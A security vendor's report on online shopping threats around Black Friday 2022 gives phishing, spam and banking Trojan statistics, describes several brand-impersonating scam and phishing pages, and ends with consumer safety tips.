Being aware that your online activity is tracked is no fun. Unfortunately, you cannot fully protect yourself against tracking — you can only minimize the amount of data that a company tracking you will obtain. That is also important, though: the less information on you is collected beyond your control, the less painful potential future leakages would be. There are various types of technical tools to protect you from web tracking. For instance, VPN changes your IP address, thus distorting to a degree the digital profile of you that marketing companies strive to build. Anti-tracking browser extensions like DNT block trackers while you surf the web, preventing companies from finding out what websites you use and how. You can also reduce the risk by sharing only the data that services need to function. That will not stop them from collecting your data, but it can significantly reduce the scope of the information that companies have about you.

2022. november 23.

Black Friday shoppers beware: online threats so far in 2022

The shopping event of the year, Black Friday, is almost here, and while the big day does not officially arrive until Friday, November 25th, deals are already starting. The day kickstarts the frenzied holiday shopping season with eye-catching promotional deals that lure shoppers into spending more of their hard-earned cash. In the weeks leading up to Black Friday, we have already seen discounts reaching 70% and even 80%, grabbing the attention of millions of customers.

Today, e-commerce sales make up 21% of global retail sales, which is a 50% increase on the pre-pandemic levels. Besides, 94% of shoppers now do at least some of their shopping online. As the volume of purchases around Black Friday increases, the attention of cybercriminals to e-commerce intensifies proportionally. The risk of being scammed runs even higher. While on ordinary days, the customer can easily see that if the product is too cheap, it is most likely a scam, during the Black Friday sales, it gets harder to tell. Shoppers become less vigilant, and therefore, an easy target for cybercriminals. That is why we constantly monitor the landscape of shopping-related cyberthreats and protect users from these risks. Here is what we have found this year.

Methodology

In this research, we analyze various types of threats, such as financial malware and phishing pages mimicking the world’s biggest retail platforms, banking and payment systems, and discuss recent trends. The threat statistics we use come from Kaspersky Security Network (KSN), a system for processing anonymized cyberthreat-related data shared voluntarily by Kaspersky users, for the period from January through October 2022. In addition, we analyzed Black Friday-related spam and phishing pages mimicking popular BNPL (buy now, pay later) services, which have proven to be particularly popular during shopping seasons like Black Friday.

Key findings

  • Over the first ten months of 2022, Kaspersky prevented 38,596,555 financial phishing attacks.
  • In 2022, the number of attacks using banking Trojans doubled when compared to the same period of 2021, reaching almost 20 million.
  • The number of financial phishing attempts for online shopping platforms (16,424,303) comprised 42.55% of all financial phishing attempts.
  • The number of phishing pages mimicking the most popular shopping platforms (Apple, Amazon, eBay, Walmart, Aliexpress, and Mercado Libre) totaled 12,787,534 in the first ten months of 2022.
  • Apple was consistently the most popular lure among online shopping platforms, with phishing attempts using its name reaching 9,858,254 in the first ten months of 2022.
  • Spam campaigns intensify as Black Friday approaches. In the first three weeks of November, Kaspersky telemetry spotted 351,800 spam emails that contained the word combination “Black Friday”. This is five times more than September’s figure.
Phishing for shopping credentials: financial threats in numbers

One of the prime threats during the shopping season is financial phishing. Kaspersky distinguishes several types of financial phishing: banking, payment system, and online store phishing. Banking phishing includes fake banking websites that cybercriminals create to mislead their victims into giving up their credentials and card details. Payment system phishing involves pages mimicking well-known payment systems, such as PayPal, Visa, MasterCard and American Express. The third type of phishing mimics online stores, such as Amazon, eBay, Aliexpress, or smaller ones.

Number of attempts to visit phishing pages using banking, online payment and online retail brands as a lure, January–October 2022 (download)

During the first ten months of 2022, Kaspersky products detected 38,596,555 phishing attacks targeting users of online shopping platforms, payment systems and banking institutions. We count one attempt to open a phishing link detected by Kaspersky as one phishing attack. During the first ten months of this year, the number of financial phishing attempts for online shopping platforms comprised 42.55% of all financial phishing attempts, which is 10.19 p.p. higher than the share of online payment phishing (32.36%), and 17.47 p.p. higher than the share of banking phishing (25.08%). Moreover, some of the payment system and banking phishing cases may be related to online store phishing. For example, if a phishing or scam page mimicking Amazon redirects the user to a payment page mimicking PayPal, these two pages will be categorized as online store and payment system phishing, respectively. In total, Kaspersky solutions detected 16,424,303 online store phishing attacks, 12,491,239 online payment phishing attacks, and 9,681,013 banking phishing attempts. We also observed a sharp spike in the number of attacks on online store users in June–July 2022. This was caused by a massive phishing campaign involving a fake Apple device giveaway, which Kaspersky security solutions successfully repelled.

Number of attempts to visit phishing pages using Apple as a lure, January–October 2022 (download)

Overall, the number of phishing attacks mimicking the most popular shopping platforms (Apple, Amazon, eBay, Walmart, Aliexpress, and Mercado Libre) amounted to 12,787,534 for the ten months of 2022. The majority of these attacks targeted Apple users: 9,858,254 phishing attempts, most of them occurring during the summer campaign mentioned above.

Number of attempts to visit phishing pages using popular shopping platforms (excluding Apple) as a lure in 2022 (download)

Amazon was the second most popular lure, with phishing attempts using its name peaking in April at 342,829. In total, 2,101,599 phishing attacks exploiting the Amazon brand were detected between January and October of 2022. The third most popular lure was, for most of 2022, Mercado Libre. Although the marketplace is local to Latin America, cybercriminals notably abused it much more via phishing attacks than global corporations like eBay or Walmart. Specifically, attackers used the brand name of Mercado Libre most heavily during the summer season, with 56,099 attempts in June and 42,862 in August, which is more than the summer figures for eBay, Walmart, and Aliexpress. Curiously, the number of phishing sites mimicking Walmart’s platform peaked in February, likely because of Valentine’s Day. During that month, we detected 76,618 phishing attempts abusing Walmart, which is 45% of all phishing attempts that targeted Walmart users in the first ten months of 2022.

“Pick a prize and cry in surprise”

A large share of fake e-commerce pages comprises scams: juicy fake offers, often made in the name of a popular brand, which draw buyers. Scam websites will typically display a discount, giveaway or another attractive deal that supposedly expires soon, urging the user to hurry while the products are free or heavily discounted. This is where cybercriminals catch customers who are hungry for freebies and fail to double-check where they are about to enter their details: on a phishing page or the official website.

A brightly colored phishing site with a Mercado Libre logo on it lights up with, “Pick a prize and cry in surprise” written in Spanish. The surprise box can contain anything: the latest iPhone, an expensive TV set, or a much-needed lawn mower for the garden. To get it, the user just needs to pay a small delivery fee. However, all they really get if they fall for the trick is their money lost and bank card details compromised.

Fake Mercado Libre site in Spanish that reads, “Pick a prize and cry in surprise”

Cybercriminals often start to spread phishing and scam pages even before Black Friday sales begin in order to squeeze out the shopping season as much as possible. One scam site, for example, offers users early access to all Amazon deals a few days before the discounts become effective, to grab everything they want before other customers sweep the shelves. To get the “early access”, you have to subscribe to “Amazon Prime” on the scammers’ website. However, paying for the subscription will not get users access to Amazon’s offers. Instead of being the first among buyers, they will join the ranks of scam victims.

Users are offered early access to Amazon sales

In addition to promises of early access, attackers use other tricks to lure victims. For example, they offer eBay gift cards for free. In order to generate a gift card code, users are asked to select an amount to add to the gift card account: from $10 to $300. They will then be asked to fill out a simple survey and to pay a small fee for the card, which the scammers promise to send by email. However, victims will not get any gift cards, but just lose their money to the scammers.

Victims are promised that gift card codes will be sent to their emails, which does not happen

A promise of cashback is another kind of bait used by cyberthieves. That is how they lured victims into a phishing scheme that targeted users of the Indian payment system PhonePe. The attackers sent out text messages promising cashback to users who followed a link. The phishing page urged victims to enter their UPI PIN: the secret code that is used to confirm transactions.

Fake cashback page phishing for UPI PINs

In certain cases, cybercriminals exploited several brands with one phishing page. On the screenshot below, the fake website mimics the login page for Landesbank Berlin’s Amazon.de cards. It offers users to “activate Visa Secure to pay safely with their Amazon.de Visa card”. To do that, the victim needs to enter their Landesbank Berlin login credentials, which will then be stolen by the attackers.

Users are prompted to log in to their Landesbank Berlin account to allegedly activate Visa Secure option

“Buy now, regret later”: phishing examples for BNPL services

“Buy now, pay later” (BNPL) services allow customers to split the cost of a purchase into several interest-free installments. These services appeal to consumers, especially youngsters, and have proven to be particularly popular during shopping days like Black Friday. Juniper Research assesses the BNPL user base at 360 million in 2022 and predicts this number to surpass 900 million globally by 2027. All of this makes BNPL an attractive target for cybercriminals.

BNPL phishing on the eve of Black Friday 2022

One of the most popular BNPL services is Affirm, with around 12.7 million active users worldwide. According to the official website, a user can shop online or in-store and pay later with the service at checkout. Another option is to request a virtual card in the app. Payments are managed in the app or online. The service offers a browser extension for Chrome.

Cybercriminals have created a nearly perfect replica of the official Affirm login page—the only difference is missing links to the privacy policy and merchant login. By creating the malicious lookalike, the attackers are trying to gain access to victims’ Affirm accounts.

Affirm phishing page

The real Affirm login page (Differences highlighted)

Another pre-Black Friday phishing site found by Kaspersky researchers spoofs an even more popular service named Afterpay (Clearpay in the U.K. and Italy), which has 20 million active users globally. Perpetrators have set up a page that mimics the official website, apparently trying to trick unsuspecting visitors into entering their bank card details, including the CVV, into a fake form.

A further example of a phishing page mimicking Afterpay is aimed at gaining access to potential victims’ accounts.

Phishing distribution

To attract potential victims to phishing pages, attackers usually send links to these pages by email. The email body employs social engineering techniques, for instance, to convince the user that they need to update their payment data, or that a lucrative deal awaits them on the phishing site. However, there are other ways of delivering phishing links, such as instant messages, social media, or SMS.

Phishing and scam: red flags

More often than not, a vigilant user can recognize phishing and scam pages. The text on the page can contain typos, while the domain name in the URL can differ from that of the official website by a few characters, contain extra words, or look totally unrelated to the brand whose users it targets. The only functional buttons are often those related to the main phishing or scam functionality: “pick your prize”, submit buttons, etc. All other buttons such as “I forgot my password”, the menu, etc. are typically unclickable or lead nowhere. That said, links to the terms of use and privacy policy in the footer of a phishing page can lead to the documents published on the original website, and thus help to conceal the website’s malicious purpose.

Spam

Despite all the benefits of online shopping, one of its most annoying downsides is finding your inbox clogged up with unsolicited email. Spam campaigns tend to intensify dramatically around the shopping and holiday seasons. From November 1 through November 17, 2022, Kaspersky telemetry recorded 351,800 emails containing the word combination “Black Friday”. This is more than five times the number of such emails recorded in October, when we saw 65,608. Compared to September, the increase is more than 32 times.

The number of spam emails containing “Black Friday”; September, October, and November 2022 (download)

When left unfiltered by antispam systems, spam is an annoyance and a waste of time. Our recent study revealed that employees who receive 30–60 external emails per day could be wasting as much as 11 hours annually looking through and identifying spam messages. For employees receiving between 60–100 emails a day, the figure increases to 18 hours per year, which is more than two business days.

Additionally, an important email might be lost in a deluge of spam and unintentionally deleted. Needless to say, many spam emails contain links to phishing and scam websites, or malicious attachments.

Banking Trojans go after payment credentials

Banking Trojans (bankers) are a staple in the arsenal of cyberthieves who seek to profit from the sales season. These are malicious computer programs that obtain access to confidential information stored or processed by online banking and payment systems. Bankers use webinjects and form-grabbing functionality to steal credentials, card details, or even all of the data a user enters on the target website.

After a sharp drop in banking Trojan attacks in 2021, cybercriminals reverted to using the tool heavily: from January through October 2022, Kaspersky products detected and prevented almost 20 million attacks, a 92% increase year on year.

Overall number of banking Trojan attacks, January–October 2020–2022 (download)

Conclusion

The shopping season is a profitable time not just for stores owners and consumers but also for cybercrooks. Every year, we see how fraudsters step up their activities amid the sales season by exploiting the names of popular stores, retail platforms and financial services. Unfortunately, the trend is not likely to go anywhere. This means users should be prepared and know how to stay protected at least from the “traditional” types of threats we observe every year: spam, phishing, and banking Trojans.

To enjoy the best that Black Friday has to offer this year, be sure to follow a few safety tips.

  • Protect all devices that you use for online shopping with a reliable security solution.
  • Do not trust any links or attachments received by email; double-check the sender’s name and email address before opening anything.
  • Check that the online store address is correct and the page has no errors or visual defects on it before filling out any forms there.
  • In order to protect your data and finances, it is a safe practice to make sure the checkout page is secure, and there is a locked padlock icon beside the address.
  • If you want to buy something from an unfamiliar company, check customer reviews before making the decision.
  • Despite taking as many precautions as possible, you probably will not know whether something is amiss until you see your bank account statement. So, if you are still getting paper statements, do not wait until they hit your mailbox. Get online to see if all of the charges look legitimate, and if not, contact your bank or card issuer immediately.